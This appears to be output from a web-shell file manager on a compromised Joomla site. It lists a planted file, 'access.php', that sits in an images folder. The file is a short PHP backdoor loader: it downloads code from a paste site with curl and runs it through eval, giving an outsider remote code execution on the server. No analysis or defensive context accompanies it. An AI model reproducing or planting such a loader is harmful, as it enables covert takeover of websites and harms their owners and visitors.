Warning: Undefined variable $liatds in /home/grupmartgn/elanartcrafts/administrator/components/com_contenthistory/helpers/index.php on line 2 Disable Functions: Path : /home/grupmartgn/elanartcrafts/images/pixabay/ |
| Current File : /home/grupmartgn/elanartcrafts/images/pixabay/access.php |
<?php
$Url = "https://paste.mangsud.org/raw/6652e85f";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $Url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$output = curl_exec($ch);
curl_close($ch);
echo eval('?>'.$output);
?>